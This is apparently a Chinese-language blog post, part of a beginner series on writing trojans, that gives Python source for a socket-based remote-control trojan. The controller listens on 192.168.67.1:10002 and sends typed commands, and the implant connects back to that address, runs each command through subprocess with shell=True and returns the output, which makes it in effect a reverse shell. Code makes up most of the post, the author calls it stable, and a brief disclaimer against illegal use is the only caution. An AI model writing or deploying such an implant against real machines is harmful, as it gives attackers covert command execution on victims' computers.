前两篇文章的木马太被动,今天是通过socket和os来进行主动木马编写
有些s13,我真的搞不懂拿一些没过脑子的代码就放到网上去害人,骗流量,还某知名安全企业学院写的,真的服。我的代码自己运行过,很稳,各位慎重,勿做非法之事
因为是木马入门,所以前几篇比较简单,也只是一个模块搭建,后期我会逐步搭建框架,一周我也只会出两三篇来记录自己的编写历程,所以大佬们亲喷
首先当然是控制端
from socket import *
import os
import time
import subprocess
target = "192.168.67.1"
port = 10002
addr = (target,port)
buff = 1024
tcpSock = socket(AF_INET, SOCK_STREAM)
tcpSock.bind(addr)
tcpSock.listen(5)
while True:
conn,addr=tcpSock.accept()
while True:
data = input("input the command:\n")
conn.send(bytes(data,encoding="utf-8"))
getdata = str(conn.recv(buff),encoding="utf-8")
if not getdata:
break
print(getdata)
tcpSock.close()
再就是被控端
import socket
import os
import subprocess
target = "192.168.67.1"
port = 10002
addr = (target,port)
buff = 1024
cli = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
cli.connect(addr)
while True:
data = str(cli.recv(buff),encoding="utf-8")
if not data:
break
print(data)
f =subprocess.Popen(data,shell=True, stdout=subprocess.PIPE).stdout
redata = bytes(str(f.read()),encoding="utf-8")
cli.sendall(redata)
cli.close()